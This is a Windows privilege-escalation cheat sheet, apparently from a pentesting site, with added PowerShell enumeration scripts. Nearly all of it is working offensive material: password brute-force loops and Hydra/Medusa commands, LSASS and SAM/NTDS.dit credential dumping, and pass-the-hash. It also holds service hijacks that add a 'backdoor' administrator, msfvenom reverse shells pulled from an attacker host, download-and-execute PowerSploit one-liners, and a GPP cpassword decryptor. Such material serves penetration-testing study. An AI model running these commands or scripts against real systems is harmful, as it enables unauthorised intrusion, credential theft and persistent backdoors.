Privilege Escalation - Windows

Windows

Privilege escalation, or vertical privilege escalation, means elevating access from a limited user account by abusing misconfigurations, design flaws and features within the Windows operating system.

    • Password Policy
      • Command# net accounts
      • Info: The net accounts command shows the local password policy, including the account lockout threshold and observation window (add /domain for the domain policy, which is what matters before any remote password attack)
    • Remote Password Attacks
      • Reference: https://www.thehackr.com/create-custom-word-lists-using-cewl/
      • Info: CeWL crawls a website, collects the interesting words and names it finds and writes them to a password dictionary file
      • Command# @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
      • Command# @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL
      • Info: Both loops try every password in pass.txt against one user before moving on to the next, so read the lockout threshold from net accounts /domain first; once that many failures land inside the observation window the account locks out
      • Command# medusa -U users -P <password list> -t 10 -h <host> -e ns -F -M <ssh | ftp> 
      • Command# medusa -u sa -P <path to password dictionary> -t 10 -h <host> -e ns -F -M mssql -n 1433
      • Info: Medusa is a remote brute-force tool. Brute-forcing passwords is a last resort, tried only after exploits have been attempted and nothing else works; it is noisy and can lock accounts out
      • Command# ncrack -vv --user <user> -P <path to password dictionary> --connection-limit 1 rdp://<remote ip>
      • Info: ncrack is a remote brute-force tool that can brute-force RDP logins; the same last-resort caveat as for Medusa applies
      • Command# hydra -P password-file.txt -v $ip snmp
      • Info: Hydra brute force against SNMP
      • Command# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
      • Info: Hydra FTP known user and password list
      • Command# hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
      • Info: Hydra SSH using list of users and passwords
      • Command# hydra -v -V -u -L users.txt -p "<known password>" -t 1 $ip ssh
      • Info: Hydra SSH using a known password and a username list
      • Command# hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
      • Info: Hydra POP3 Brute Force
      • Command# hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
      • Info: Hydra SMTP Brute Force
      • Command# hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
      • Info: Hydra against an HTTP Basic auth (401) login with a dictionary; here the same file is used for both user names and passwords
      • Command# hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
      • Info: Hydra attack Windows Remote Desktop with rockyou 
      • Command# hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'
      • Info: Hydra brute force of a WordPress admin login; success is detected by the Location redirect header (S=Location) instead of a failure string
    • Local Password Attacks (require administrative access)
      • Command# powershell -enc <base64-encoded Invoke-Mimikatz command>
      • Info: Loads Mimikatz into memory through an encoded PowerShell command and dumps credentials from LSASS
      • Command# procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
      • Command# mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit
      • Info: procdump writes a full memory dump of lsass.exe to disk; mimikatz then extracts the passwords and hashes from the dump offline
      • Command# C:\> reg.exe save hklm\sam c:\temp\sam.save
      • Command# C:\> reg.exe save hklm\security c:\temp\security.save
      • Command# C:\> reg.exe save hklm\system c:\temp\system.save
      • Info: Saves the SAM, SECURITY and SYSTEM hives to disk; the SYSTEM hive holds the boot key needed to decrypt the other two
      • Command: secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
      • Info: secretsdump.py (Impacket) retrieves the NTLM hashes, cached domain credentials and LSA secrets from the saved hives
      • Reference: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
      • Command# python hate_crack.py <hash_file> <hash_type>
      • Reference: https://github.com/trustedsec/hate_crack
      • Command# .\Invoke-NinjaCopy.ps1 -path "c:\windows\system32\config\system" -localdestination "c:\system"
      • Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\<file-path>\sam"
      • Command# .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\security" -LocalDestination "c:\security"
      • Info: Invoke-NinjaCopy reads the raw NTFS volume, so it can copy the hive files while the OS holds them locked
      • Reference: https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
      • Reference: ntds_decode.exe https://goo.gl/bpdv9d
      • Command# vssadmin create shadow /for=C:
      • Command# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
      • Command# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
      • Info: The volume shadow copy utility vssadmin can be used to copy NTDS.dit, the database that holds every domain password hash on a domain controller, together with the SYSTEM hive that is needed to decrypt it
      • Command# python esedbxtract.py -n ntds.dit -s system
      • Info: A script to extract password hashes from a domain controller using the NTDS.dit file and SYSTEM hive.
      • Reference: https://bitbucket.org/grimhacker/esedbxtract
      • Command# pth-winexe --user=<domain/workgroup>/<user>%<ntlm hash> //<remote ip> cmd
      • Command# wce.exe -s <computer name>:<user>:<ntlm hash>
      • Info: Pass the hash; wce supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all service packs, 32-bit and 64-bit)
      • Reference: Pass the hash tools http://chousensha.github.io/blog/2015/04/04/kali-tools-catalog-password-attacks/
  • Services (running with higher privileges)
    • Permissions on Services
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/accesschk.exe','accesschk.exe')
      • Reference: https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
      • Info: Check for read and write permissions on the registry keys of Windows services
      • Command# accesschk -kwsu <hostname>\<privusr> hklm\system\currentcontrolset\services
      • Info: Point the vulnerable service at the payload instead of its own binary
      • Command# reg add HKLM\SYSTEM\CurrentControlSet\Services\<vulnerable_service> /v ImagePath /t REG_EXPAND_SZ /d "c:\temp\payload.exe" /f
      • Info: XP requires Accesschk version 5.2
      • Command# accesschk.exe -uwcqv *
      • Info: accesschk -uwcqv * lists every service with the principals that may change its configuration; look for Authenticated Users, Everyone, Users or the current account
      • Command# sc qc "vuln-service"
      • Command# sc config "vuln-service" binpath= "net user backdoor P@$$w0rd123! /add"
      • Command# sc stop "vuln-service"
      • Command# sc start "vuln-service"
      • Command# sc config "vuln-service" binpath= "net localgroup administrators backdoor /add"
      • Command# sc stop "vuln-service"
      • Command# sc start "vuln-service"
      • Command# sc stop <vuln-service>
      • Command# sc config <vuln-service> binPath= "<file path to reverse shell executable>" depend= "" start= demand obj= ".\LocalSystem" password= ""
      • Command# sc start <vuln-service>
      • Info: If the logged-in user can modify the configuration of a service that runs with higher privileges, run sc qc on that service: the output shows the binary it runs (BINARY_PATH_NAME) and the account it runs as (SERVICE_START_NAME)
                          Then run the sc config, sc stop and sc start commands above to create a new user and add it to the local administrators group. Because net user is not a real service binary, sc start reports a timeout (error 1053), but the command has already executed as the service account by then; the user needs the right to stop and start the service, or the service must start on reboot
    • Permissions on Service Executables
      • Command# icacls "<file path>" 
      • Info: The results from the sc qc command will show the service executable, after identifying the file path, execute icacls on the file path to show the permissions
      • Info: On the attacker box build a reverse shell executable named after the service binary
      • Command# msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f exe -o <name of the service executable to replace>
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/<service-executable.exe>','<service-executable.exe>')
      • Info: Replace the Windows service executable with the reverse shell, then restart the service (or reboot if the user cannot stop it)
    • Unquoted Windows Service Paths
      • Command# wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
      • Info: Lists auto-start services outside C:\Windows whose binary path is not quoted; look for paths that contain spaces
      • Info: Use icacls "<file path>" on the executable and look for modifiable permissions
      • Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe"
      • Info: If the executable itself is not writable, walk the unquoted path from the left: at every space Windows first tries the text before that space with .exe appended, so for the path above it tries C:\Program.exe, then C:\Program Files (x86)\OpenVPN.exe, before it reaches ovpnagent.exe. Check each parent directory with icacls and drop a reverse shell under the first candidate name whose directory is writable
      • Command# icacls "C:\"
      • Command# msfvenom -p windows/shell_reverse_tcp lhost=<attacker_ip> lport=<attacker_listeningport> -f exe -o Program.exe
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program.exe')
      • Command# icacls "C:\Program Files (x86)\"
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN.exe')
      • Command# icacls "C:\Program Files (x86)\OpenVPN Technologies\"
      • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/Program.exe','C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel.exe')
      • Info: The last drop only applies when the path has a space directly after PrivateTunnel; with the path shown above it does not, so only Program.exe and OpenVPN.exe are candidates. The service must be restarted (or the box rebooted) before the planted binary runs
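The three checks above (who can reconfigure the service, who can write its executable, and which unquoted-path prefixes a limited user can plant) are usually done one service at a time with sc qc and icacls. The following PowerShell is an added example, not code from the original page, that runs the executable and unquoted-path checks across every service at once. It assumes PowerShell 3.0 or later on the target (Get-CimInstance); service names and paths come from the live system.

```powershell
# Added example (not from the original page). Assumes PowerShell 3.0 or later
# on the target; service names and paths are read from the live system.
function Test-PathWritable {
    param([Parameter(Mandatory)][string]$Path)
    # True when an Allow ACE on the file or directory grants a write-class right
    # to the current user, one of its groups, or a catch-all principal.
    # Deny ACEs are not evaluated; confirm a hit with icacls or a real write.
    if (-not (Test-Path -LiteralPath $Path -ErrorAction SilentlyContinue)) { return $false }
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -contains $sid) { return $true }
    }
    return $false
}

function Get-ServiceBinaryPath {
    param([Parameter(Mandatory)][string]$PathName)
    # Strip service arguments: a quoted path is whatever sits inside the quotes,
    # otherwise take everything up to the first ".exe"
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $PathName.Trim()
}

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    # For an unquoted path with spaces, CreateProcess tries each prefix that ends
    # at a space with ".exe" appended: C:\Program.exe, then
    # "C:\Program Files (x86)\OpenVPN.exe" for the OpenVPN service above
    $exe = Get-ServiceBinaryPath $PathName
    if ($PathName.TrimStart().StartsWith('"') -or $exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $candidates = for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
    return @($candidates)
}

function Find-WeakServices {
    # One row per service whose binary, or one of whose unquoted-path hijack
    # locations, the current user can write to
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceBinaryPath $svc.PathName
        $hijack = @()
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            $dir = Split-Path -Path $cand -Parent
            if ($dir -and (Test-PathWritable $dir)) { $hijack += $cand }
        }
        $binWritable = Test-PathWritable $exe
        if ($binWritable -or $hijack.Count -gt 0) {
            [pscustomobject]@{
                Name           = $svc.Name
                StartMode      = $svc.StartMode
                RunAs          = $svc.StartName
                Binary         = $exe
                BinaryWritable = $binWritable
                UnquotedHijack = ($hijack -join '; ')
            }
        }
    }
}

Find-WeakServices | Format-Table -AutoSize
```

Each row is a service worth running sc qc against by hand: BinaryWritable means the executable can be replaced as in the section above, and UnquotedHijack lists the exact file names to plant. The ACL check reads the DACL rather than attempting a write because a test write against a service binary would be destructive.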
    • Services Containing Orphaned DLLs
      • Info: Known Services with orphaned dlls
        • Windows 7 32/64 bit 
          • IKE and AuthIP IPsec Keying Modules (IKEEXT)   – wlbsctrl.dll
            • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker-ip>/Ikeext-Privesc.ps1','Ikeext-Privesc.ps1')
            • Reference: https://goo.gl/bKJbW9
            • Info: Automatically detects and exploits the IKE and AuthIP IPsec Keying Modules service by planting wlbsctrl.dll in a writable %PATH% directory and starting the service
            • Info: The exploit creates a user called backdoor with password p@$$w0rd123! and adds it to the local administrators group
          • Windows Media Center Receiver Service (ehRecvr)  – ehETW.dll
          • Windows Media Center Scheduler Service (ehSched) – ehETW.dll
          • Info: The Windows Media Center services have a manual startup type and are not running by default. They only run as NETWORK SERVICE, so a planted DLL gets that account's privileges; from there, hijack a SYSTEM token with the Lonely Potato technique (it needs SeImpersonatePrivilege, which service accounts hold)
          • Info: The Windows Media Center services can be started through the following scheduled tasks:
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\mcupdate"
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\MediaCenterRecoveryTask"
            • schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\ActivateWindowsSearch"
        • Windows XP 
          • Automatic Updates (wuauserv) – ifsproxy.dll
          • Remote Desktop Help Session Manager (RDSessMgr) – SalemHook.dll
          • Remote Access Connection Manager (RasMan) – ipbootp.dll
          • Windows Management Instrumentation (winmgmt)  – wbemcore.dll
        • Additional Vulnerable Services
          • Audio Service (STacSV)    – SFFXComm.dll SFCOM.DLL 
          • Intel(R) Rapid Storage Technology (IAStorDataMgrSvc)    – DriverSim.dll
          • Juniper Unified Network Service(JuniperAccessService)   – dsLogService.dll
          • Encase Enterprise Agent  – SDDisk.dll 
          • Reference: https://www.greyhathacker.net/?p=738
        • Info: Check permissions on the folders that make up the default DLL search order
          • DLL hijacking is exploitable when the current directory or a folder in %PATH% is writable and is searched before the directory holding the real DLL, or when the DLL does not exist anywhere
          • Note: Locating missing DLLs
            • Load Procmon and add filters for
            • Path ends with .dll
            • Result is NAME NOT FOUND
            • Path contains the folder being investigated (or the process name of the target service)
          • Note: C:\windows\system32 (limited users usually do not have access to write to this directory)
          • C:\Windows\system (limited users usually do not have access to write to this directory)
          • C:\windows (limited users usually do not have access to write to this directory)
          • Note: Locating implant folders
            • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/ankh2054/windows-pentest/master/Powershell/folderperms.ps1','C:\folderperms.ps1')
            • Command# powershell -ep bypass .\folderperms.ps1
            • Info: PowerShell script to automatically detect writable directories stored in %path%
            • Command: echo %path%
            • Info: echo %path% will print out the directories stored in the system or the user path
            • Info: Once a writable directory is found, implant a DLL that creates a user and adds it to the local administrators group (adduser.c in the reference is such a DLL)
            • Reference: https://github.com/newsoft/adduser/blob/master/adduser.c
        • Note: Check permissions on files and folders
          • Command# accesschk.exe -qwsu "Authenticated Users" *
          • Command# accesschk.exe -qwsu "Everyone" *
          • Command# accesschk.exe -qwsu "Power Users" *
      • Runtime DLL Names
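The folderperms.ps1 check above answers "which %PATH% directories can I write to"; what also matters is whether the missing DLL would be resolved from that directory before any real copy, which depends on the search order. The PowerShell below is an added example, not code from the original page or from folderperms.ps1, that lists the writable %PATH% entries and then walks the SafeDllSearchMode order for a given DLL name (wlbsctrl.dll, the IKEEXT case, by default). It assumes a local session on the target; the probe-file approach and the default application directory are choices of this example.

```powershell
# Added example (not from the original page). Assumes a local PowerShell session;
# wlbsctrl.dll is the IKEEXT case above and any other DLL name can be passed in.
function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Dir)
    # Probe by creating and deleting a uniquely named file. Unlike reading the
    # ACL, this accounts for deny ACEs and nested group membership.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container -ErrorAction SilentlyContinue)) { return $false }
    $probe = [IO.Path]::Combine($Dir, 'probe_' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-WritablePathDirs {
    param([string]$PathVar = $env:PATH)
    # Same question folderperms.ps1 answers: every %PATH% entry, whether it
    # exists and whether the current user can drop a file into it
    $seen = @{}
    foreach ($raw in ($PathVar -split ';')) {
        $dir = $raw.Trim().Trim('"')
        if (-not $dir -or $seen.ContainsKey($dir.ToLower())) { continue }
        $seen[$dir.ToLower()] = $true
        [pscustomobject]@{
            Directory = $dir
            Exists    = [bool](Test-Path -LiteralPath $dir -PathType Container -ErrorAction SilentlyContinue)
            Writable  = Test-DirectoryWritable $dir
        }
    }
}

function Find-DllImplantDir {
    param([Parameter(Mandatory)][string]$DllName, [string]$AppDir = "$env:SystemRoot\System32")
    # Default (SafeDllSearchMode on) LoadLibrary order: application directory,
    # System32, System, Windows, current directory, then each %PATH% entry.
    # The DLL is hijackable if a writable directory comes before every directory
    # that already holds a copy. $AppDir defaults to System32 because the
    # services listed above run inside svchost.exe.
    $order = @($AppDir, "$env:SystemRoot\System32", "$env:SystemRoot\System", $env:SystemRoot, (Get-Location).Path) +
             @(($env:PATH -split ';') | ForEach-Object { $_.Trim().Trim('"') } | Where-Object { $_ })
    foreach ($dir in $order) {
        $candidate = [IO.Path]::Combine($dir, $DllName)
        if (Test-Path -LiteralPath $candidate -ErrorAction SilentlyContinue) {
            # A real copy sits earlier in the order; nothing after it is reachable
            return [pscustomobject]@{ Dll = $DllName; Hijackable = $false; ExistingCopy = $candidate; ImplantDir = $null }
        }
        if (Test-DirectoryWritable $dir) {
            return [pscustomobject]@{ Dll = $DllName; Hijackable = $true; ExistingCopy = $null; ImplantDir = $dir }
        }
    }
    [pscustomobject]@{ Dll = $DllName; Hijackable = $false; ExistingCopy = $null; ImplantDir = $null }
}

Get-WritablePathDirs | Format-Table -AutoSize
Find-DllImplantDir -DllName 'wlbsctrl.dll'
```

ImplantDir is where adduser.dll (renamed to the missing DLL's name) goes; if ExistingCopy is set instead, an earlier directory already satisfies the load and the %PATH% entry, however writable, is never consulted.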
  • Scheduled Tasks (running with higher privileges)
    • Command: schtasks
    • Info: Lists the scheduled tasks with their next run time and status
    • Command: schtasks /query /fo LIST /v 
    • Info: Prints out scheduled tasks configuration including executables, with file paths Useful in identifying executables that can be modified 
    • Command# cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
    • Info: Save the verbose output to schtask.txt, move it to the attacker box and filter it down to the Task To Run lines of tasks running as SYSTEM
    • Info: Take note of tasks that run ONLOGON or ONSTART, since the system starts these without user interaction; if such a task runs as SYSTEM and its binary is writable, replacing the binary gives elevated access at the next boot or logon
    • Command# schtasks /end /tn <task name>
    • Info: Ends a scheduled task
    • Command# schtasks /run /tn <task name>
    • Info: Runs a scheduled task
    • Reference: MS10-092 Task Scheduler exploit https://goo.gl/cM12Ku
    • Info: The MS10-092 Task Scheduler exploit creates the user backdoor with password p@$$w0rd123! and adds it to the local administrators group
    • Info: Supported OS: Windows 7/2008 x86/x64 without the MS10-092 patch
    • Command: at HH:MM /interactive cmd.exe
    • Info: On XP the at command runs its jobs as SYSTEM, so an interactive cmd.exe scheduled this way gives a SYSTEM shell; it requires administrative access, so this is an admin-to-SYSTEM step rather than a user-to-admin one
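The grep filter above is normally run on the attacker box after moving the schtasks output across. The PowerShell below is an added example, not code from the original page, that does the same triage on the target: it parses schtasks /query /fo CSV /v, keeps the tasks that run as SYSTEM on boot or logon, extracts the executable from Task To Run, and parses icacls output for that file to report which low-privileged principals can modify it. It assumes schtasks.exe and icacls.exe are present (any supported Windows build) and that the CSV column names match the English schtasks output.

```powershell
# Added example (not from the original page). Assumes schtasks.exe and
# icacls.exe are available and produce English column names and rights.
function Get-IcaclsWriteGrants {
    param([Parameter(Mandatory)][string]$Path)
    # Parse icacls lines such as "BUILTIN\Users:(I)(M)" and return the principals
    # granted a write-class right (F, M, W, WD or AD), ignoring DENY entries
    $grants = @()
    $lines = & icacls.exe $Path 2>$null
    foreach ($line in $lines) {
        # The first line carries the file name before the first ACE; strip it
        $entry = ($line -replace [regex]::Escape($Path), '').Trim()
        if ($entry -notmatch '^(?<who>[^:]+):(?<rights>(?:\([^)]*\))+)$') { continue }
        $who = $Matches['who']
        $rights = $Matches['rights']
        if ($rights -match '\(DENY\)') { continue }
        if ($rights -match '\((F|M|W)\)' -or $rights -match '\([^)]*\b(WD|AD)\b[^)]*\)') { $grants += $who }
    }
    return $grants
}

function Find-WeakScheduledTasks {
    param([switch]$AllTriggers)
    $me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    $interesting = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', $me)
    # schtasks repeats its header row per task folder; those rows parse as a
    # task whose HostName column literally reads "HostName", so drop them
    $tasks = schtasks.exe /query /fo CSV /v 2>$null | ConvertFrom-Csv |
             Where-Object { $_.HostName -ne 'HostName' }
    foreach ($t in $tasks) {
        if ($t.'Run As User' -notmatch 'SYSTEM') { continue }
        # "At system start up" / "At logon time" are the ONSTART / ONLOGON triggers
        if (-not $AllTriggers -and $t.'Schedule Type' -notmatch 'logon|start') { continue }
        $cmd = $t.'Task To Run'
        if ($cmd -match '^\s*"([^"]+)"') { $exe = $Matches[1] }
        elseif ($cmd -match '^\s*(.+?\.exe)\b') { $exe = $Matches[1] }
        else { $exe = $cmd.Trim() }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        $writers = Get-IcaclsWriteGrants $exe | Where-Object { $interesting -contains $_ }
        if ($writers) {
            [pscustomobject]@{
                Task       = $t.TaskName
                Trigger    = $t.'Schedule Type'
                RunAs      = $t.'Run As User'
                Binary     = $exe
                WritableBy = ($writers -join ', ')
            }
        }
    }
}

Find-WeakScheduledTasks | Format-Table -AutoSize
```

Use -AllTriggers to include SYSTEM tasks on timers as well, which can then be fired immediately with schtasks /run /tn as shown above instead of waiting for a reboot. Tasks whose action is a COM handler rather than an executable produce no icacls output and are skipped.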
  • AutoStart Process (running with higher privileges)
    • Modifiable AutoRun Binaries/Scripts in registry
    • Command: autorunsc.exe -a | findstr /n /R "File\ not\ found"
    • Reference: https://goo.gl/i2rddj
    • Info: Autorunsc (Sysinternals) should be downloaded from the reference link; it flags autorun entries whose file is missing, and such an entry can be satisfied with a backdoor
    • Info: Once a missing file is identified, use icacls to check the permissions on each directory CreateProcess searches for an unqualified name, in this order:
      • The directory the calling application was loaded from
      • The current working directory of the parent process
      • C:\Windows\System32
      • C:\Windows\System (the 16-bit system directory)
      • C:\Windows
      • Each directory in %PATH%, in order
  • Installed Applications
    • Command# wmic product get name,version /format:csv
    • Info: Lists installed MSI products as CSV; look up each version for known vulnerabilities. Querying Win32_Product makes Windows Installer run a consistency check (and possibly a repair) on every product, which is slow and leaves event log entries; the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall list the same software without that side effect
  • Installed Drivers
    • Command# DRIVERQUERY 
  • Interesting Files Containing Creds
    • Command# dir /s access.log error.log
    • Info: Find Apache web logs
    • Command# dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
    • Info: Is XAMPP, Apache or PHP installed? Their configuration files frequently contain database credentials
    • Command# dir /a C:\inetpub\
    • Command# type C:\Windows\System32\inetsrv\config\applicationHost.config
    • Info: Find IIS Inetpub Files
    • Command# findstr /si password *.txt
    • Command# findstr /si password *.xml
    • Command# findstr /si password *.ini
    • Command# dir /s sysprep.inf sysprep.xml unattended.xml unattend.xml unattend.txt 2>nul
    • Command# dir /b /s vnc.ini ultravnc.ini 2>nul
    • Command# dir /s *pass* == *cred* == *vnc* == *.config*
    • Command# findstr /spin "password" *.*
    • Command#  dir /b /s Groups.xml Drives.xml DataSources.xml Printers.xml Services.xml ScheduledTasks.xml 2>nul
    • Info: On a domain-joined host look for these Group Policy Preference files under \\<domain>\SYSVOL (c:\windows\sysvol on a domain controller)
    • Command# icacls %SYSTEMROOT%\repair\SAM
    • Command# icacls %SYSTEMROOT%\System32\config\RegBack\SAM
    • Command# icacls %SYSTEMROOT%\System32\config\SAM
    • Command# icacls %SYSTEMROOT%\repair\system
    • Command# icacls %SYSTEMROOT%\System32\config\SYSTEM
    • Command# icacls %SYSTEMROOT%\System32\config\RegBack\system
    • Info: Decrypt Group Policy Preference passwords (the cpassword attribute) with gp3finder -D <cpassword>
    • Reference: https://goo.gl/NHF3nP
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1""");Get-GPPPassword -Server <computer domain name>
    • Info: Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
    • Command# cmdkey /list
    • Info: Lists the credentials saved in the Windows Credential Manager for the current user
    • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1""");Get-VaultCredential
    • Info: Displays Windows vault credential objects including cleartext web credentials
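The file searches in this section and the Get-GPPPassword download both reduce to two pieces of work: walking the disk for files that are likely to hold credentials, and decrypting the cpassword attribute found in the SYSVOL XML files. The PowerShell below is an added example, not code from the original page or from PowerSploit, that does both offline. The search roots and file-name hints are assumptions; the SYSVOL path defaults to the current domain; the AES-256 key is the one Microsoft published for Group Policy Preferences (MS-GPPREF 2.2.1.1.4), which is why every cpassword on every domain decrypts with it.

```powershell
# Added example (not from the original page). The search roots, name hints and
# SYSVOL path are assumptions; the AES key is the published MS-GPPREF key.
function Find-CredentialFiles {
    param([string[]]$Roots = @('C:\'), [string]$Pattern = 'password')
    # Name-based hits first (the dir /s searches above), then a content search
    # over text-like files (the findstr /si searches)
    $nameHints = 'unattend*.xml', 'sysprep.inf', 'sysprep.xml', 'web.config', '*.config',
                 '*vnc*.ini', 'php.ini', 'my.ini', 'my.cnf', 'httpd*.conf', '*.rdp', '*.kdbx',
                 '*pass*', '*cred*'
    $textTypes = '*.txt', '*.xml', '*.ini', '*.config', '*.cfg', '*.conf', '*.ps1', '*.bat', '*.vbs'
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -File -Include $nameHints -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Kind = 'name'; Path = $_.FullName; Hit = $_.Name } }
        Get-ChildItem -Path $root -Recurse -File -Include $textTypes -ErrorAction SilentlyContinue |
            Select-String -Pattern $Pattern -SimpleMatch -List -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Kind = 'content'; Path = $_.Path; Hit = "$($_.LineNumber): $($_.Line.Trim())" } }
    }
}

function ConvertFrom-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # cpassword = Base64(AES-256-CBC(UTF-16LE password)) with a zero IV and the
    # trailing '=' padding stripped, so the padding has to be restored first
    $keyHex = '4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'
    $key = New-Object byte[] 32
    for ($i = 0; $i -lt 32; $i++) { $key[$i] = [Convert]::ToByte($keyHex.Substring(2 * $i, 2), 16) }
    $b64 = $Cpassword
    switch ($b64.Length % 4) { 2 { $b64 += '==' } 3 { $b64 += '=' } }
    $cipher = [Convert]::FromBase64String($b64)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Key = $key
        $aes.IV = New-Object byte[] 16
        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    } finally { $aes.Dispose() }
    return [System.Text.Encoding]::Unicode.GetString($plain)
}

function Get-GppPasswords {
    param([string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL")
    # Walk the GPP XML files listed above and decrypt every cpassword attribute
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Drives.xml', 'Printers.xml'
    Get-ChildItem -Path $SysvolPath -Recurse -File -Include $names -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_.FullName
        [xml]$doc = Get-Content -LiteralPath $file -Raw
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            # The account lives in a different attribute depending on the file type
            $account = foreach ($a in 'userName', 'accountName', 'runAs', 'newName') {
                if ($node.HasAttribute($a)) { $node.GetAttribute($a); break }
            }
            [pscustomobject]@{
                File     = $file
                Account  = $account
                Password = ConvertFrom-GppCpassword $node.GetAttribute('cpassword')
                Changed  = $node.ParentNode.GetAttribute('changed')
            }
        }
    }
}

Get-GppPasswords | Format-Table -AutoSize
Find-CredentialFiles -Roots 'C:\Users', 'C:\inetpub', 'C:\xampp' | Format-Table -AutoSize
```

The SYSVOL share is readable by every domain user, so Get-GppPasswords needs no elevation; the Changed column helps decide whether a decrypted password is likely still current.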
  • Interesting Data Stored In The Registry
